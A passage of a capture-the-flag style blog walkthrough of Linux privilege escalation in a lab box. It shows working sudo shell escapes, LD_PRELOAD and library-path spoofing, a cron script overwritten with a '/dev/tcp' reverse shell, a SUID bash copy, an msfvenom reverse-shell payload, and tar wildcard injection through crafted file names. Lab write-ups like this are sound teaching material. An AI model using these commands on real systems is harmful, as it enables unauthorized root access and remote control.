<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="409" height="545" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-221.png" alt="" class="wp-image-1138639" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-221.png 409w, https://blog.finxter.com/wp-content/uplo...25x300.png 225w" sizes="(max-width: 409px) 100vw, 409px" /></figure>
</div>
<h2>TASK 6 Sudo – Shell Escape Sequences</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="534" height="796" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-233.png" alt="" class="wp-image-1138660" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-233.png 534w, https://blog.finxter.com/wp-content/uplo...01x300.png 201w" sizes="(max-width: 534px) 100vw, 534px" /></figure>
</div>
<p>Let’s check our sudo privileges:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l</pre>
<p>We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins</p>
<p>Today we’ll choose to run the exploit utilizing the more bin file.</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Link</strong>: <a href="https://gtfobins.github.io/gtfobins/more/" target="_blank" rel="noreferrer noopener">https://gtfobins.github.io/gtfobins/more/</a></p>
<p>Running the following two commands gives us a root shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">TERM= sudo more /etc/profile
!/bin/sh
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="420" height="595" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-222.png" alt="" class="wp-image-1138643" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-222.png 420w, https://blog.finxter.com/wp-content/uplo...12x300.png 212w" sizes="(max-width: 420px) 100vw, 420px" /></figure>
</div>
<h2>TASK 7 Sudo – Environment Variables</h2>
<h3>Method 1: preload file spoofing</h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="530" height="564" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-223.png" alt="" class="wp-image-1138644" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-223.png 530w, https://blog.finxter.com/wp-content/uplo...82x300.png 282w" sizes="(max-width: 530px) 100vw, 530px" /></figure>
</div>
<h3>Method 2: shared object spoofing</h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="675" height="247" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-224.png" alt="" class="wp-image-1138645" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-224.png 675w, https://blog.finxter.com/wp-content/uplo...00x110.png 300w" sizes="(max-width: 675px) 100vw, 675px" /></figure>
</div>
<h2>TASK 8 Cron Jobs – File Permissions</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="711" height="537" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-234.png" alt="" class="wp-image-1138661" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-234.png 711w, https://blog.finxter.com/wp-content/uplo...00x227.png 300w" sizes="(max-width: 711px) 100vw, 711px" /></figure>
</div>
<p>In this task, we will root the Linux box by changing the file <code>overwrite.sh</code> that is scheduled to run automatically every minute on cron jobs. </p>
<p>Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.</p>
<p>Overwrite the file with the following:</p>
<pre class="wp-block-preformatted"><code>#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1</code></pre>
<p>Now, all we need to do is start a <code>netcat</code> listener and wait for a maximum of 1 minute to catch the revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="807" height="497" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-225.png" alt="" class="wp-image-1138647" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-225.png 807w, https://blog.finxter.com/wp-content/uplo...00x185.png 300w, https://blog.finxter.com/wp-content/uplo...68x473.png 768w" sizes="(max-width: 807px) 100vw, 807px" /></figure>
</div>
<h2>TASK 9 Cron Jobs – PATH Environment Variable</h2>
<p>In this task, we will hijack the <code>PATH</code> environment variable by creating an <code>overwrite.sh</code> file in <code>/home/user</code> directory.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~$ cat overwrite.sh #!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
</pre>
<p>This bash script will copy <code>/bin/bash</code> (the shell) to the <code>tmp</code> directory, then add execute privileges and an <code>suid</code> bit. After the <code>overwrite.sh</code> file runs, we can manually activate the root shell by running the new file “<code>rootbash</code>” with persistence mode.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="800" height="895" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-226.png" alt="" class="wp-image-1138648" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-226.png 800w, https://blog.finxter.com/wp-content/uplo...68x300.png 268w, https://blog.finxter.com/wp-content/uplo...68x859.png 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>
</div>
<h2>TASK 10 Cron Jobs – Wildcards</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="708" height="468" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-235.png" alt="" class="wp-image-1138662" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-235.png 708w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w" sizes="(max-width: 708px) 100vw, 708px" /></figure>
</div>
<p>In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our <code>netcat</code> listener. </p>
<p>First, let’s create a new payload for a revshell</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf</pre>
<p>Next, we’ll transfer the elf file to <code>/home/usr</code> on the target via a <a href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank" rel="noreferrer noopener">simple HTTP server</a>. Finally, we need to create two empty files with the following names:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
</pre>
<p>Finally, we’ll need to start up a <code>netcat</code> listener to catch the root shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="765" height="173" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-227.png" alt="" class="wp-image-1138649" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-227.png 765w, https://blog.finxter.com/wp-content/uplo...300x68.png 300w" sizes="(max-width: 765px) 100vw, 765px" /></figure>
</div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="393" height="481" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-228.png" alt="" class="wp-image-1138650" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-228.png 393w, https://blog.finxter.com/wp-content/uplo...45x300.png 245w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
</div>
<h2>POST-EXPLOITATION</h2>
<p>Let’s remove the shell and the other two spoofed empty command extension files.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf
</pre>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="527" height="797" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-236.png" alt="" class="wp-image-1138665" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-236.png 527w, https://blog.finxter.com/wp-content/uplo...98x300.png 198w" sizes="(max-width: 527px) 100vw, 527px" /></figure>
</div>
<p>Magic isn’t actually needed to carry out any of the <code>privesc</code> methods outlined in this post. </p>
<p>As long as the target machine has a misconfiguration on password files (<code>/etc/shadow</code> and/or <code>/etc/passwd</code>), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.</p>
<p>Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods.</p>
</div>
https://www.sickgaming.net/blog/2023/02/...ation-1-2/